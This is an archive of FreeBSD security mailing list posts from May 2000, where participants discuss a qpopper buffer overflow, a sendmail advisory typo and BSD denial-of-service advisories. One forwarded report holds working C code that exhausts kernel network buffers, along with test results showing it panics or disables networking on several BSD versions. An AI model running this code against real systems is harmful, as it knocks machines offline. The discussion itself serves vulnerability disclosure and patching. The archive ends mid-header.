From owner-freebsd-security Mon May 29 7:14:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 273CD37BA27 for ; Mon, 29 May 2000 07:14:10 -0700 (PDT) (envelope-from petervd@vuurwerk.nl) Received: (qmail 98641 invoked from network); 29 May 2000 14:14:03 -0000 Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 29 May 2000 14:14:03 -0000 Received: (qmail 20175 invoked by uid 11109); 29 May 2000 14:14:03 -0000 Mail-Followup-To: freebsd-security@FreeBSD.ORG Date: Mon, 29 May 2000 16:14:03 +0200 From: Peter van Dijk To: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit Message-ID: <20000529161403.H19887@vuurwerk.nl> References: <20000525160410I.1001@eccosys.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000525160410I.1001@eccosys.com>; from sen_ml@eccosys.com on Thu, May 25, 2000 at 04:04:10PM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 25, 2000 at 04:04:10PM +0900, sen_ml@eccosys.com wrote: [snip] > > > > Here is the original advisory. Note that the actual advisory is > > correct WRT the file and line numbers. The posts on Bugtraq indicate to > > patch pop_msg.c instead of pop_uidl.c. > > while patching and restarting a qpopper server locally, i started > wondering...how much of a problem is this on a freebsd system where > /var/mail or /var/spool/mail is not setgid mail? As with the IMAP exploit, this will give people a shell, which they usually didn't have beforehand, when they are just popusers. Greetz, Peter. -- petervd@vuurwerk.nl - Peter van Dijk [student:developer:madly in love] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 12:52:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail2.wmptl.com (mail2.wmptl.com [216.221.73.131]) by hub.freebsd.org (Postfix) with ESMTP id ACC1337BEF2 for ; Mon, 29 May 2000 12:52:36 -0700 (PDT) (envelope-from webmaster@wmptl.com) Received: from wmptl.com ([10.0.0.168]) by mail2.wmptl.com (8.9.3/8.9.3) with ESMTP id PAA53003 for ; Mon, 29 May 2000 15:58:41 -0400 (EDT) (envelope-from webmaster@wmptl.com) Message-ID: <3932CA78.551BCAF2@wmptl.com> Date: Mon, 29 May 2000 15:52:24 -0400 From: Nathan Vidican Reply-To: webmaster@wmptl.com X-Mailer: Mozilla 4.72 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following is an excerpt taken from ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc, please note that the subject seems to shift from sendmail over to Apache under the section 'IV. Solution(s)'. I may be wrong here, but nonetheless I assumed it'd be worth writting about. Seems like a typo to me? II. Problem Description Sendmail has the ability to deliver mail to a program on the local system via a pipe. This feature is often used to support automatic mail filtering and vacation programs. This provides a very flexible way to deliver information to an automated task running on a mailserver. Unfortunately, this allows unprivileged users to write tasks that may not properly check for common attacks via the program delivery system. The next release of FreeBSD will now install the sendmail restricted shell utility, smrsh in /usr/libexec and create the directory /usr/libexec/sm.bin to hold programs that may be executed by sendmail to deliver mail to pipes. III. Impact There is no known security impact on FreeBSD systems at the of this document's publication. There is no direct requirement to install the smrsh utility. The FreeBSD Project suggests using smrsh in conjunction with sendmail in environments where the local system administrator believes there is a need to protect against as-of-yet undiscovered security holes in sendmail. Use of this utility is /not/ enabled by default in standard sendmail configuration files distributed by FreeBSD to retain backwards compatibility with previous sendmail operation. Use of this utility may break functionality that users expect. Please read the smrsh(8) manual page and/or the README file in /usr/src/usr.sbin/sendmail/smrsh BEFORE attempting to use smrsh. IV. Solution(s) This program is available in the 2.1-stable and 2.2-current source code distributions. It is not compiled, installed, or enabled in FreeBSD 2.1.0 by default. The Apache Group released version 1.05 of the daemon which fixes this vulnerability. The FreeBSD Project updated the ports and packages system to use this new daemon. Interested parties may obtain an updated pre-compiled FreeBSD package from: ftp://ftp.freebsd.org/pub/FreeBSD/packages-current/www/apache-1.0.5.tgz and an updated "automatic port" from the directory hierarchy: ftp://ftp.freebsd.org/pub/FreeBSD/ports-current/www/apache.tar.gz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 13: 5:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 50C1837BCF3 for ; Mon, 29 May 2000 13:05:24 -0700 (PDT) (envelope-from will@almanac.yi.org) Received: from almanac.yi.org (pm014-018.dialup.bignet.net [64.79.82.130]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id QAA08307; Mon, 29 May 2000 16:05:16 -0400 Received: by almanac.yi.org (Postfix, from userid 1000) id AB4AE19A3; Mon, 29 May 2000 16:04:40 -0400 (EDT) Date: Mon, 29 May 2000 16:04:40 -0400 From: Will Andrews To: Nathan Vidican Cc: security@FreeBSD.ORG Subject: Re: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc Message-ID: <20000529160440.C16637@argon.gryphonsoft.com> References: <3932CA78.551BCAF2@wmptl.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <3932CA78.551BCAF2@wmptl.com>; from webmaster@wmptl.com on Mon, May 29, 2000 at 03:52:24PM -0400 X-Operating-System: FreeBSD 5.0-CURRENT i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 29, 2000 at 03:52:24PM -0400, Nathan Vidican wrote: > The following is an excerpt taken from > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc, This problem was addressed in 1996.. why are you bringing it up now? Just because there appears to be some mistake in the advisory? -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 13:12:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail2.wmptl.com (mail2.wmptl.com [216.221.73.131]) by hub.freebsd.org (Postfix) with ESMTP id 2289237BD17 for ; Mon, 29 May 2000 13:12:50 -0700 (PDT) (envelope-from webmaster@wmptl.com) Received: from wmptl.com ([10.0.0.168]) by mail2.wmptl.com (8.9.3/8.9.3) with ESMTP id QAA53305; Mon, 29 May 2000 16:18:31 -0400 (EDT) (envelope-from webmaster@wmptl.com) Message-ID: <3932CF1D.863BD9F@wmptl.com> Date: Mon, 29 May 2000 16:12:13 -0400 From: Nathan Vidican Reply-To: webmaster@wmptl.com X-Mailer: Mozilla 4.72 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: Will Andrews Cc: security@freebsd.org Subject: Re: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc References: <3932CA78.551BCAF2@wmptl.com> <20000529160440.C16637@argon.gryphonsoft.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Will Andrews wrote: > > On Mon, May 29, 2000 at 03:52:24PM -0400, Nathan Vidican wrote: > > The following is an excerpt taken from > > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc, > > This problem was addressed in 1996.. why are you bringing it up now? > Just because there appears to be some mistake in the advisory? > > -- > Will Andrews > GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- > ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ > G++>+++ e->++++ h! r-->+++ y? I was wondering; I'm rather new to sendmail, and I wasn't aware of how old this problem was. I didn't know if Apache actually made the fix, or if this was a typo in the documentation; THAT is what I was asking. I was confused about the documentation; I was refered to said document from a 'Security Holes Explored' webpage. Sorry if I in any-way sparked any eggression, I just didn't understand the documentation. I am assuming at this point that it was just a typo then no? Nathan Vidican webmaster@wmptl.com Windsor Match Plate & Tool Ltd. http://www.wmptl.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 13:19:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 82CA237BD01 for ; Mon, 29 May 2000 13:19:46 -0700 (PDT) (envelope-from will@almanac.yi.org) Received: from almanac.yi.org (pm014-018.dialup.bignet.net [64.79.82.130]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id QAA10157; Mon, 29 May 2000 16:19:12 -0400 Received: by almanac.yi.org (Postfix, from userid 1000) id 1635719A3; Mon, 29 May 2000 16:18:36 -0400 (EDT) Date: Mon, 29 May 2000 16:18:36 -0400 From: Will Andrews To: Nathan Vidican Cc: Will Andrews , security@freebsd.org Subject: Re: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc Message-ID: <20000529161836.F16637@argon.gryphonsoft.com> References: <3932CA78.551BCAF2@wmptl.com> <20000529160440.C16637@argon.gryphonsoft.com> <3932CF1D.863BD9F@wmptl.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <3932CF1D.863BD9F@wmptl.com>; from webmaster@wmptl.com on Mon, May 29, 2000 at 04:12:13PM -0400 X-Operating-System: FreeBSD 5.0-CURRENT i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 29, 2000 at 04:12:13PM -0400, Nathan Vidican wrote: > I was wondering; I'm rather new to sendmail, and I wasn't aware of how > old this problem was. I didn't know if Apache actually made the fix, or > if this was a typo in the documentation; THAT is what I was asking. I > was confused about the documentation; I was refered to said document > from a 'Security Holes Explored' webpage. Sorry if I in any-way sparked > any eggression, I just didn't understand the documentation. I am > assuming at this point that it was just a typo then no? Ah, it's just fine.. there's nothing wrong with browsing the archives. Note that the name of the file you looked at is "FreeBSD-SA-96:03" which means the 3rd advisory for the year 1996. Perhaps it was indeed a genuine mistake in the advisory, but I wasn't around back then. Maybe Warner Losh, FreeBSD's Security Officer, could address your questions. But in general, I don't think anyone needs to worry about problems that are 4 years old and were taken care of. :-) -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 15:36:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id CDAF037B7D9 for ; Mon, 29 May 2000 15:36:41 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 41458 invoked by uid 1000); 29 May 2000 22:36:40 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 29 May 2000 22:36:40 -0000 Date: Mon, 29 May 2000 17:36:40 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: NetBSD Security Advisory 2000-005 (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Out of curiosity; does anyone know if this vaguely defined problem affects freebsd? Mike "Silby" Silbersack ---------- Forwarded message ---------- Date: Sun, 28 May 2000 23:47:24 -0400 From: NetBSD Security Officer To: BUGTRAQ@SECURITYFOCUS.COM Subject: NetBSD Security Advisory 2000-005 -----BEGIN PGP SIGNED MESSAGE----- NetBSD Security Advisory 2000-005 ================================= Topic: Local "cpu-hog" denial of service Version: all versions prior to 2000/04/20 Severity: low; untrusted local user can hog CPU Abstract ======== Untrusted local processes can hog cpu and kernel memory by tricking the kernel into running exclusively on their behalf, denying other processes the CPU. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 17:45:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A6F0B37B507 for ; Mon, 29 May 2000 17:45:28 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA39140; Mon, 29 May 2000 18:45:26 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA12276; Mon, 29 May 2000 18:45:09 -0600 (MDT) Message-Id: <200005300045.SAA12276@harmony.village.org> To: Mike Silbersack Subject: Re: NetBSD Security Advisory 2000-005 (fwd) Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 29 May 2000 17:36:40 CDT." References: Date: Mon, 29 May 2000 18:45:09 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : Out of curiosity; does anyone know if this vaguely defined problem affects : freebsd? Vaguely :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 19:34:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 8E52B37B50B for ; Mon, 29 May 2000 19:34:04 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 18987 invoked from network); 30 May 2000 02:29:49 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 30 May 2000 02:29:49 -0000 To: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit From: sen_ml@eccosys.com In-Reply-To: <20000529161403.H19887@vuurwerk.nl> References: <20000525160410I.1001@eccosys.com> <20000529161403.H19887@vuurwerk.nl> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000530113403A.1001@eccosys.com> Date: Tue, 30 May 2000 11:34:03 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 19 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Peter van Dijk Subject: Re: QPOPPER: Remote gid mail exploit Date: Mon, 29 May 2000 16:14:03 +0200 Message-ID: <20000529161403.H19887@vuurwerk.nl> > On Thu, May 25, 2000 at 04:04:10PM +0900, sen_ml@eccosys.com wrote: > [snip] > > > while patching and restarting a qpopper server locally, i started > > wondering...how much of a problem is this on a freebsd system where > > /var/mail or /var/spool/mail is not setgid mail? > > As with the IMAP exploit, this will give people a shell, which they usually > didn't have beforehand, when they are just popusers. since the problem has to w/ a pop command that's issued after successful authentication, if the user already has shell access, then there isn't anything to worry about, is there? or is the shell running as some other user? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 29 20: 0:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id D81DD37B59F for ; Mon, 29 May 2000 20:00:06 -0700 (PDT) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id MAA30908; Tue, 30 May 2000 12:59:52 +1000 Date: Tue, 30 May 2000 12:59:48 +1000 (EST) From: Bruce Evans X-Sender: bde@besplex.bde.org To: Mike Silbersack Cc: security@FreeBSD.ORG Subject: Re: NetBSD Security Advisory 2000-005 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 May 2000, Mike Silbersack wrote: > Out of curiosity; does anyone know if this vaguely defined problem affects > freebsd? > > Mike "Silby" Silbersack > > ---------- Forwarded message ---------- > Date: Sun, 28 May 2000 23:47:24 -0400 > From: NetBSD Security Officer > To: BUGTRAQ@SECURITYFOCUS.COM > Subject: NetBSD Security Advisory 2000-005 > > -----BEGIN PGP SIGNED MESSAGE----- > > NetBSD Security Advisory 2000-005 > ================================= > > Topic: Local "cpu-hog" denial of service > Version: all versions prior to 2000/04/20 > Severity: low; untrusted local user can hog CPU I fixed at least some of the cpu time hogs (mainly /dev/zero) in Feb. 1999. I don't remember any fixes for the kernel space hogs (large malloc()s by ktrace). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 0:31:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 514DD37BD4A; Tue, 30 May 2000 00:31:53 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id AAA56545; Tue, 30 May 2000 00:31:53 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Tue, 30 May 2000 00:31:53 -0700 (PDT) From: Kris Kennaway To: sen_ml@eccosys.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: <20000530113403A.1001@eccosys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 May 2000 sen_ml@eccosys.com wrote: > > As with the IMAP exploit, this will give people a shell, which they usually > > didn't have beforehand, when they are just popusers. > > since the problem has to w/ a pop command that's issued after > successful authentication, if the user already has shell access, then > there isn't anything to worry about, is there? or is the shell > running as some other user? I don't believe this (the text you replied to above) is true. As I understand it the vulnerability is that an attacker can send a email with a certain header which will be parsed by the pop server when a client downloads the email using the EUIDL command, at which point the buffer overflows and can execute arbitrary code as gid mail (or whatever the pop server runs as). So it's much worse than the imap hole. As a consolation, it's harder to exploit on FreeBSD because of a fix we made in the port, but it's still reportedly exploitable. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 0:52:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 68C4F37B98A for ; Tue, 30 May 2000 00:52:38 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 24678 invoked from network); 30 May 2000 07:48:21 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 30 May 2000 07:48:21 -0000 To: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit From: sen_ml@eccosys.com In-Reply-To: References: <20000530113403A.1001@eccosys.com> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000530165232H.1001@eccosys.com> Date: Tue, 30 May 2000 16:52:32 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 30 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Kris Kennaway Subject: Re: QPOPPER: Remote gid mail exploit Date: Tue, 30 May 2000 00:31:53 -0700 (PDT) Message-ID: > On Tue, 30 May 2000 sen_ml@eccosys.com wrote: > > > > As with the IMAP exploit, this will give people a shell, which they usually > > > didn't have beforehand, when they are just popusers. > > > > since the problem has to w/ a pop command that's issued after > > successful authentication, if the user already has shell access, then > > there isn't anything to worry about, is there? or is the shell > > running as some other user? > > I don't believe this (the text you replied to above) is true. As I > understand it the vulnerability is that an attacker can send a email with > a certain header which will be parsed by the pop server when a client > downloads the email using the EUIDL command, at which point the buffer > overflows and can execute arbitrary code as gid mail (or whatever the pop > server runs as). So it's much worse than the imap hole. thanks a lot for the explanation. > As a consolation, it's harder to exploit on FreeBSD because of a fix > we made in the port, but it's still reportedly exploitable. i'm a bit confused here -- does this mean the current port is still vulnerable or that the port available at the time of the exploit announcement happened to be hard to exploit? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 1:40:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from Athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id D125837B90B for ; Tue, 30 May 2000 01:40:40 -0700 (PDT) (envelope-from jus@security.za.net) Received: from localhost (jus@localhost) by Athena.za.net (8.9.3/8.9.3) with ESMTP id KAA00271 for ; Tue, 30 May 2000 10:39:51 +0200 (SAST) (envelope-from jus@security.za.net) X-Authentication-Warning: Athena.za.net: jus owned process doing -bs Date: Tue, 30 May 2000 10:39:51 +0200 (SAST) From: Justin Stanford X-Sender: jus@Athena.za.net To: freebsd-security@freebsd.org Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tested aswell on 3.4-STABLE and 4.0-STABLE - it works. -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions ---------- Forwarded message ---------- Date: Mon, 29 May 2000 09:05:23 -0500 (CDT) From: Vacuum To: news@technotronic.com Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Release Date: April 29, 2000 Systems Affected: FreeBSD 3.3-RELEASE FreeBSD 4.0-RELEASE FreeBSD 5.0 (maybe) Openbsd 2.5 Openbsd 2.6 Openbsd 2.7 (maybe) NetBSD 1.4.1 NetBSD 1.4.2 (maybe) THE PROBLEM From an original posting made about last September by Sven Berkenvs (sven@ILSE.NL) to bugtraq: --- Forward --- I stumbled across a denial of service attack on FreeBSD systems, where an unpriviledged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too: FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions. OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend. NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD. --- End of Forward --- Upon testing this code on the new versions of *bsd the exploit still works. FreeBSD - 3.3-RELEASE: reboots the pc FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs recieves /kernel: xl0: no memory for rx list -- packet dropped! All network connection is dead and the route table is a mess. FreeBSD - 5.0-Current: Untested Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full Openbsd - 2.7: Untested NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase NMBCLUS The network connection is dead. NetBSD - 1.4.2: Untested From what I have tested on, Linux does not have any issue with this piece of code. As for the other unices, they have not been tested. THE CODE The original code written by Sven Berkenvs that causes this: #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } Underground Security Systems Research http://www.ussrback.com Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f,Technotronic and Rfp. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Feedback: Please send suggestions, updates, and comments to: Underground Security Systems Research mail:labs@ussrback.com http://www.ussrback.com u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com ------------ Output from pgp ------------ Opening file "/dev/null" type text. Opening file "/home/jus/pgp4pine.tmp" type binary. Signature by unknown keyid: 0x8D8FA0C3 Opening file "/dev/null" type text. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 1:51:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B1BB37B583; Tue, 30 May 2000 01:51:51 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id BAA72904; Tue, 30 May 2000 01:51:50 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Tue, 30 May 2000 01:51:50 -0700 (PDT) From: Kris Kennaway To: sen_ml@eccosys.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: <20000530165232H.1001@eccosys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 May 2000 sen_ml@eccosys.com wrote: > i'm a bit confused here -- does this mean the current port is still > vulnerable or that the port available at the time of the exploit > announcement happened to be hard to exploit? The latter. It was fixed on FreeBSD on 2000/05/25 - an advisory is forthcoming. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 2: 8:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 93BC837B57B for ; Tue, 30 May 2000 02:08:10 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 26210 invoked from network); 30 May 2000 09:03:52 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 30 May 2000 09:03:52 -0000 To: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit From: sen_ml@eccosys.com In-Reply-To: References: <20000530165232H.1001@eccosys.com> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000530180805Y.1001@eccosys.com> Date: Tue, 30 May 2000 18:08:05 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 20 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: Kris Kennaway Subject: Re: QPOPPER: Remote gid mail exploit Date: Tue, 30 May 2000 01:51:50 -0700 (PDT) Message-ID: > On Tue, 30 May 2000 sen_ml@eccosys.com wrote: > > > i'm a bit confused here -- does this mean the current port is still > > vulnerable or that the port available at the time of the exploit > > announcement happened to be hard to exploit? > > The latter. It was fixed on FreeBSD on 2000/05/25 - an advisory is > forthcoming. aha. thanks for the clarification. p.s. i started to wonder about whether there were any decent alternative pop daemons. anyone have any suggestions? i'd have switched to the pop daemon that comes w/ qmail but i don't want to convert to Maildir just yet. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 30 4: 7:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.polytechnic.edu.na (mail.polytechnic.edu.na 